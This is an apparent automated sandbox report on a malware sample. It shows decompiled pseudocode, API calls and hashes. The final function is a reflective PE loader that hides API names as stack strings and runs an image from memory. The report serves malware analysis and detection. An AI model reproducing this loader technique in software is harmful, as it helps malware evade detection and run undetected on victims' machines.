						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x460c40[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x460c44;
					while(1) {
						_t69 = E0045DE80(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x460d40 =  *0x460d40 + 0x20;
						__eflags =  *0x460d40;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x460d40 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x460d40; // 0x20
					goto L18;
				}
			}

0x0045d01c
0x0045d021
0x0045d025
0x0045d02a
0x0045d02b
0x0045d031
0x0045d03b
0x0045d03b
0x0045d041
0x0045d045
0x0045d049
0x0045d04c
0x0045d050
0x0045d054
0x0045d059
0x0045d05c
0x0045d05c
0x0045d067
0x0045d06d
0x0045d072
0x0045d149
0x0045d149
0x0045d149
0x0045d14b
0x0045d14b
0x0045d151
0x0045d154
0x0045d158
0x0045d15b
0x0045d1aa
0x0045d1aa
0x0045d1aa
0x00000000
0x0045d1aa
0x0045d15d
0x0045d15f
0x0045d163
0x0045d16f
0x0045d171
0x0045d171
0x0045d165
0x0045d167
0x0045d167
0x0045d17b
0x0045d17d
0x0045d180
0x0045d199
0x0045d199
0x0045d182
0x0045d183
0x0045d189
0x0045d18b
0x00000000
0x00000000
0x0045d18d
0x0045d192
0x0045d194
0x0045d197
0x0045d19f
0x0045d1a2
0x0045d1a4
0x0045d1a4
0x00000000
0x0045d1a2
0x00000000
0x0045d197
0x0045d1ae
0x0045d1ae
0x0045d1af
0x0045d1af
0x0045d1c4
0x0045d1c4
0x0045d078
0x0045d07b
0x0045d07d
0x00000000
0x00000000
0x0045d083
0x0045d085
0x0045d08b
0x0045d093
0x0045d095
0x0045d097
0x0045d097
0x0045d099
0x0045d09f
0x0045d0f7
0x0045d0f7
0x0045d0f9
0x0045d0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0045d0fd
0x0045d0fd
0x0045d100
0x0045d102
0x0045d105
0x00000000
0x00000000
0x0045d107
0x0045d109
0x0045d10b
0x00000000
0x00000000
0x0045d10d
0x0045d10f
0x0045d11c
0x0045d123
0x0045d123
0x0045d130
0x0045d138
0x0045d13c
0x00000000
0x0045d13c
0x0045d112
0x0045d118
0x0045d11a
0x00000000
0x00000000
0x00000000
0x0045d13f
0x0045d13f
0x0045d143
0x0045d144
0x0045d145
0x0045d145
0x00000000
0x0045d0a1
0x0045d0a1
0x0045d0a6
0x0045d0ab
0x0045d0b0
0x0045d0b3
0x00000000
0x00000000
0x0045d0b5
0x0045d0b5
0x0045d0bc
0x0045d0be
0x0045d0be
0x0045d0c4
0x0045d0c4
0x0045d0c6
0x00000000
0x00000000
0x0045d0c8
0x0045d0cc
0x0045d0cf
0x0045d0d3
0x0045d0d9
0x0045d0dc
0x0045d0dc
0x0045d0e4
0x0045d0e7
0x0045d0ed
0x00000000
0x00000000
0x00000000
0x0045d0ef
0x0045d0f1
0x00000000
0x0045d0f1

APIs

GetStartupInfoA.KERNEL32(?), ref: 0045D067
GetFileType.KERNEL32(?,?,00000000), ref: 0045D112
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0045D175
GetFileType.KERNEL32(00000000,?,00000000), ref: 0045D183
SetHandleCount.KERNEL32 ref: 0045D1BA

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 243bc8d3b433b535eb0012521f37a877bbb3a2005efd5c068a84628679726580
Instruction ID: b3bd2de1173b64c844965d105ddb11b7d46c3fa228d1f44ebae3e601670f6dc0
Opcode Fuzzy Hash: 243bc8d3b433b535eb0012521f37a877bbb3a2005efd5c068a84628679726580
Instruction Fuzzy Hash: 9C512571D007418BC734CF68CC847667BA0AF1172AF24476EC996DB2E2E738984AC75A

Uniqueness

Uniqueness Score: -1.00%

Function 0045D22C, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045D22C() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x458c0c);
				if(_t16 == 0) {
					_t16 = E0045E375(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x458c0c, _t16) == 0) {
						E0045C898(0x10);
					} else {
						E0045D219(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x0045d23a
0x0045d242
0x0045d246
0x0045d251
0x0045d257
0x0045d281
0x0045d26a
0x0045d26b
0x0045d271
0x0045d277
0x0045d27b
0x0045d27b
0x0045d257
0x0045d288
0x0045d292

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,0045FCAD,0045E680,00000000,?,?,00000000,00000001), ref: 0045D22E
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0045D23C
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0045D288

Part of subcall function 0045E375: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045E46B

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0045D260
GetCurrentThreadId.KERNEL32 ref: 0045D271

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 246f131815f1e20c34b41e9f6a4ac710abae5b6d5268bcbaafad0cd6967545d4
Instruction ID: ba693ec4ad11c64e8a10c2fd9ec3c2ec2f5f12fb3d8e0fd11b7d5ee20e409d53
Opcode Fuzzy Hash: 246f131815f1e20c34b41e9f6a4ac710abae5b6d5268bcbaafad0cd6967545d4
Instruction Fuzzy Hash: F4F096359053519BD7312B71BD0965A3B64DF017B3F10427AFD85B66B2CF38C88946A8

Uniqueness

Uniqueness Score: -1.00%

Function 0045F0E0, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045F0E0() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x458e80 != 0xffffffff) {
					_t43 = HeapAlloc( *0x460c28, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x458e70;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x458e70) {
							HeapFree( *0x460c28, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x458e70) {
						 *_t43 = 0x458e70;
						_t25 =  *0x458e74; // 0x458e70
						 *(_t43 + 4) = _t25;
						 *0x458e74 = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x458e70 == 0) {
							 *0x458e70 = 0x458e70;
						}
						if( *0x458e74 == 0) {
							 *0x458e74 = 0x458e70;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E0045FC50(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}

0x0045f0eb
0x0045f107
0x0045f10b
0x00000000
0x00000000
0x00000000
0x0045f0ed
0x0045f0ed
0x0045f111
0x0045f127
0x0045f12b
0x0045f206
0x0045f20c
0x0045f217
0x0045f217
0x0045f21d
0x00000000
0x0045f21d
0x0045f143
0x0045f200
0x00000000
0x0045f200
0x0045f150
0x0045f170
0x0045f172
0x0045f177
0x0045f17a
0x0045f183
0x0045f152
0x0045f159
0x0045f15b
0x0045f15b
0x0045f167
0x0045f169
0x0045f169
0x0045f167
0x0045f185
0x0045f18b
0x0045f191
0x0045f194
0x0045f194
0x0045f197
0x0045f19a
0x0045f19d
0x0045f1a0
0x0045f1a7
0x0045f1a9
0x0045f1b3
0x0045f1b4
0x0045f1b6
0x0045f1b9
0x0045f1bc
0x0045f1c8
0x0045f1d0
0x0045f1d9
0x0045f1e0
0x0045f1e3
0x0045f1e5
0x0045f1ec
0x0045f1ec
0x00000000
0x0045f1f4

APIs

HeapAlloc.KERNEL32(00000000,00002020,00458E70,00458E70,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000), ref: 0045F101
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000), ref: 0045F125
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000), ref: 0045F13F
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000,?), ref: 0045F200
HeapFree.KERNEL32(00000000,00000000,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000,?,00000000), ref: 0045F217

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 9504d2432e76de44d8a30c8fe1427842a5ca6af4fda3c03015bbda762a3f64df
Instruction ID: a0c64b51559a5c796b17c284b3697de23bf408b880b14a6f13410a1d098c5b96
Opcode Fuzzy Hash: 9504d2432e76de44d8a30c8fe1427842a5ca6af4fda3c03015bbda762a3f64df
Instruction Fuzzy Hash: 28310471540B01DBD3218F28DC45B26B6B0E754B66F10423AE955E7792DFB8AC4C8B4D

Uniqueness

Uniqueness Score: -1.00%

Function 0045CC8A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0045CC8A() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				CHAR* _t40;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x460d48; // 0x1
				if(_t46 == 0) {
					E0045DC7D();
				}
				_t40 = "C:\\Users\\alfons\\Desktop\\OII9x4FeW7.exe";
				GetModuleFileNameA(0, _t40, 0x104);
				_t14 =  *0x460d58; // 0x643338
				 *0x4606cc = _t40;
				_t37 = _t40;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E0045CD23(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = E0045DE80(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E0045C898(8);
				}
				E0045CD23(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x4606b4 = _t41;
				 *0x4606b0 = _t27;
				return _t27;
			}

0x0045cc8e
0x0045cc92
0x0045cc9a
0x0045cc9c
0x0045cc9c
0x0045cca1
0x0045ccad
0x0045ccb3
0x0045ccb8
0x0045ccbe
0x0045ccc2
0x0045ccc4
0x0045ccc4
0x0045ccd1
0x0045cce5
0x0045ccec
0x0045ccf0
0x0045ccf5
0x0045cd07
0x0045cd12
0x0045cd13
0x0045cd1b
0x0045cd22

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\OII9x4FeW7.exe,00000104,?,00000000,?,?,?,?,0045C830), ref: 0045CCAD

Strings

C:\Users\user\Desktop\OII9x4FeW7.exe, xrefs: 0045CCA1, 0045CCAB, 0045CCD0, 0045CD06
83d, xrefs: 0045CCB3

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName
String ID: 83d$C:\Users\user\Desktop\OII9x4FeW7.exe
API String ID: 514040917-1437102747
Opcode ID: 50c53521d81c47daecc90236341e5d438fe1cf6aa3ddea91ab6617209dc0c965
Instruction ID: 1c1e642ffd25bb10984e0f8b93a36713ce13c0e9cfab9480dd0ecfc158638fb1
Opcode Fuzzy Hash: 50c53521d81c47daecc90236341e5d438fe1cf6aa3ddea91ab6617209dc0c965
Instruction Fuzzy Hash: 0C114FB2900208AFD711EB95DDC1C9F77BCEB45359B10017AF905D7212E6B46E488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0045EF34, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045EF34() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x4609f8; // 0x0
				_t26 =  *0x4609e8; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x4609fc; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x460c28, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x4609f8 =  *0x4609f8 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x460c28, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x460c28, 0,  *0x4609fc, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x4609e8 =  *0x4609e8 + 0x10;
				 *0x4609fc = _t25;
				_t15 =  *0x4609f8; // 0x0
				goto L3;
			}

0x0045ef34
0x0045ef39
0x0045ef45
0x0045ef77
0x0045ef77
0x0045ef8d
0x0045ef90
0x0045ef98
0x0045ef9b
0x0045efc7
0x00000000
0x0045efc7
0x0045efaa
0x0045efb2
0x0045efb5
0x0045efcb
0x0045efcf
0x0045efd1
0x0045efd4
0x0045efdd
0x00000000
0x0045efe0
0x0045efc1
0x00000000
0x0045efc1
0x0045ef47
0x0045ef5c
0x0045ef64
0x00000000
0x00000000
0x0045ef66
0x0045ef6d
0x0045ef72
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0045ECFC,00000000,00000000,00000000,0045DF0C,00000000,00000000,?,00000000,00000000,00000000), ref: 0045EF5C
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0045ECFC,00000000,00000000,00000000,0045DF0C,00000000,00000000,?,00000000,00000000,00000000), ref: 0045EF90
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0045EFAA
HeapFree.KERNEL32(00000000,?), ref: 0045EFC1

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 28e37a3ea8ead9a519e62383a7744047ba747b71d991be978f1a1d1f32382460
Instruction ID: 0a860bdffad66fa8c15086bd89fdb96649a9dd0b9e320e4b5754fb2e630511ec
Opcode Fuzzy Hash: 28e37a3ea8ead9a519e62383a7744047ba747b71d991be978f1a1d1f32382460
Instruction Fuzzy Hash: 211191B1201201EFE7648F2AEC45D277BB2FB443217214A3AF1A5D65B1E7F09989CF09

Uniqueness

Uniqueness Score: -1.00%

Function 0045D7C4, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045D7C4(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x458cfc);
				InitializeCriticalSection( *0x458cec);
				InitializeCriticalSection( *0x458cdc);
				InitializeCriticalSection( *0x458cbc);
				return _t1;
			}

0x0045d7c4
0x0045d7d1
0x0045d7d9
0x0045d7e1
0x0045d7e9
0x0045d7ec

APIs

InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7D1
InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7D9
InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7E1
InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7E9

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: af0b12ecfa4860e6e589f22cd847165de4c3ab99de7d2191986c1a962918db90
Instruction ID: ef4f378e49ee6049587b8f5ed066726ac4ae8cbdf93ba56c60c18ece843dc990
Opcode Fuzzy Hash: af0b12ecfa4860e6e589f22cd847165de4c3ab99de7d2191986c1a962918db90
Instruction Fuzzy Hash: 1BC00231916278AACF132B65FC0484A3F26FB443A2325807BF544721368E229C60EFE8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Ogxog.exe PID: 6188 Parent PID: 3604 Ogxog.exeCOMMON

Executed Functions

Function 0045BD5A, Relevance: 64.7, APIs: 3, Strings: 40, Instructions: 189
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0045BD5A(void* __ecx, void* __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				signed char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				signed char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				signed char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				void* __ebx;
				intOrPtr* _t106;
				void* _t108;
				intOrPtr _t110;
				void* _t112;
				void* _t114;
				intOrPtr _t115;
				void* _t118;
				void* _t119;
				intOrPtr _t123;
				intOrPtr* _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				intOrPtr* _t131;
				void* _t135;
				signed int _t137;
				signed int _t138;
				intOrPtr _t143;
				void* _t144;
				intOrPtr _t157;
				void* _t158;
				intOrPtr* _t159;

				_v36 = _v36 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_push( &_v64);
				_push( &_v48);
				_push(0);
				_v48 = 0x4b;
				_v47 = 0x45;
				_v46 = 0x52;
				_v45 = 0x4e;
				_v44 = 0x45;
				_v43 = 0x4c;
				_v42 = 0x33;
				_v41 = 0x32;
				_v40 = 0x2e;
				_v39 = 0x64;
				_v38 = 0x6c;
				_v37 = 0x6c;
				_v64 = 0x56;
				_v63 = 0x69;
				_v62 = 0x72;
				_v61 = 0x74;
				_v60 = 0x75;
				_v59 = 0x61;
				_v58 = 0x6c;
				_v57 = 0x41;
				_v56 = 0x6c;
				_v55 = 0x6c;
				_v54 = 0x6f;
				_v53 = 0x63;
				_v8 = E0045BAB0( &_v48, _t129, __ecx, __edx);
				_v66 = _v66 & 0x00000000;
				_v80 = 0x47;
				_push( &_v80);
				_t36 =  &_v48; // 0x4b
				_push(_t36);
				_push(0);
				_v79 = 0x65;
				_v78 = 0x74;
				_v77 = 0x50;
				_v76 = 0x72;
				_v75 = 0x6f;
				_v74 = 0x63;
				_v73 = 0x65;
				_v72 = 0x73;
				_v71 = 0x73;
				_v70 = 0x48;
				_v69 = 0x65;
				_v68 = 0x61;
				_v67 = 0x70;
				_v16 = E0045BAB0(_t36, _t129, __ecx, __edx);
				_v23 = _v23 & 0x00000000;
				_v32 = 0x48;
				_push( &_v32);
				_t55 =  &_v48; // 0x4b
				_push(_t55);
				_push(0);
				_v31 = 0x65;
				_v30 = 0x61;
				_v29 = 0x70;
				_v28 = 0x41;
				_v27 = 0x6c;
				_v26 = 0x6c;
				_v25 = 0x6f;
				_v24 = 0x63;
				_t106 = E0045BAB0(_t55, _t129, __ecx, __edx);
				_t64 =  &_a4; // 0x4d
				_t158 =  *_t64;
				_v20 = _t106;
				if( *_t158 != 0x5a4d) {
					L11:
					return 0;
				}
				_t131 =  *((intOrPtr*)(_t158 + 0x3c)) + _t158;
				if( *_t131 != 0x4550) {
					goto L11;
				}
				_t108 = VirtualAlloc( *(_t131 + 0x34),  *(_t131 + 0x50), 0x2000, 4);
				_v12 = _t108;
				if(_t108 != 0) {
					L4:
					_t110 = _v20(_v16(0, 0x14));
					_t76 =  &_v12; // 0x4d
					_t135 =  *_t76;
					 *((intOrPtr*)(_t110 + 0xc)) = 0;
					 *((intOrPtr*)(_t110 + 8)) = 0;
					 *((intOrPtr*)(_t110 + 0x10)) = 0;
					 *(_t110 + 4) = _t135;
					_v20 = _t110;
					VirtualAlloc(_t135,  *(_t131 + 0x50), 0x1000, 4);
					_t85 =  &_v12; // 0x4d, executed
					_t112 = VirtualAlloc( *_t85,  *(_t131 + 0x54), 0x1000, 4);
					_t137 =  *((intOrPtr*)(_t158 + 0x3c)) +  *(_t131 + 0x54);
					_t138 = _t137 >> 2;
					memcpy(_t112, _t158, _t138 << 2);
					_t114 = memcpy(_t158 + _t138 + _t138, _t158, _t137 & 0x00000003);
					_t90 =  &_a4; // 0x4d
					_t143 =  *_t90;
					_t159 = _v20;
					_t92 =  &_v12; // 0x4d
					_t157 =  *_t92;
					_t149 =  *((intOrPtr*)(_t143 + 0x3c));
					_t115 = _t114 +  *((intOrPtr*)(_t143 + 0x3c));
					 *_t159 = _t115;
					 *((intOrPtr*)(_t115 + 0x34)) = _t157;
					E0045BF74(_t143,  *((intOrPtr*)(_t143 + 0x3c)), _t169, _t143, _t131, _t159); // executed
					_t118 = _t157 -  *(_t131 + 0x34);
					_t170 = _t118;
					if(_t118 != 0) {
						E0045C22D(_t159, _t118);
						_pop(_t143);
					}
					_t119 = E0045C2A7(_t143, _t149, _t170, _t159); // executed
					_t171 = _t119;
					_pop(_t144);
					if(_t119 == 0) {
						L10:
						E0045C520(_t144, _t149, _t174, _t159);
						goto L11;
					} else {
						E0045C0A1(_t144, _t149, _t171, _t159); // executed
						_pop(_t144);
						_t123 =  *((intOrPtr*)( *_t159 + 0x28));
						if(_t123 == 0) {
							L13:
							return _t159;
						}
						_t125 = _t123 + _t157;
						if(_t125 == 0) {
							goto L10;
						}
						_t126 =  *_t125(_t157, 1, 0); // executed
						_t174 = _t126;
						if(_t126 != 0) {
							 *((intOrPtr*)(_t159 + 0x10)) = 1;
							goto L13;
						}
						goto L10;
					}
				}
				_t128 = _v8(0,  *(_t131 + 0x50), 0x2000, 4);
				_t169 = _t128;
				_v12 = _t128;
				if(_t128 == 0) {
					goto L11;
				}
				goto L4;
			}

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,?,?,?,?,00000000), ref: 0045BE93
VirtualAlloc.KERNEL32(Main,?,00001000,00000004,?,?,?,?,?,?,?,00000000), ref: 0045BEDE
VirtualAlloc.KERNEL32(Main,?,00001000,00000004,?,?,?,?,?,?,?,00000000), ref: 0045BEEA

Strings

o, xrefs: 0045BDCE
Main, xrefs: 0045BE61, 0045BF03, 0045BF13
t, xrefs: 0045BDB2
a, xrefs: 0045BE40
l, xrefs: 0045BDBE
r, xrefs: 0045BDFB
i, xrefs: 0045BDAA
e, xrefs: 0045BE07
KERNEL32.dll, xrefs: 0045BD6F
KERNEL32.dll, xrefs: 0045BDEA, 0045BDED
VirtualAlloc, xrefs: 0045BD6A
l, xrefs: 0045BDC6
e, xrefs: 0045BE3C
o, xrefs: 0045BE54
e, xrefs: 0045BDEF
e, xrefs: 0045BE17
l, xrefs: 0045BE4C
G, xrefs: 0045BDE5
c, xrefs: 0045BE58
A, xrefs: 0045BE48
c, xrefs: 0045BDD2
Main, xrefs: 0045BEC0, 0045BEE7, 0045BF09, 0045BEDD
V, xrefs: 0045BDA6
c, xrefs: 0045BE03
p, xrefs: 0045BE1F
l, xrefs: 0045BDCA
a, xrefs: 0045BDBA
s, xrefs: 0045BE0B
t, xrefs: 0045BDF3
p, xrefs: 0045BE44
A, xrefs: 0045BDC2
H, xrefs: 0045BE13
H, xrefs: 0045BE32
s, xrefs: 0045BE0F
r, xrefs: 0045BDAE
P, xrefs: 0045BDF7
o, xrefs: 0045BDFF
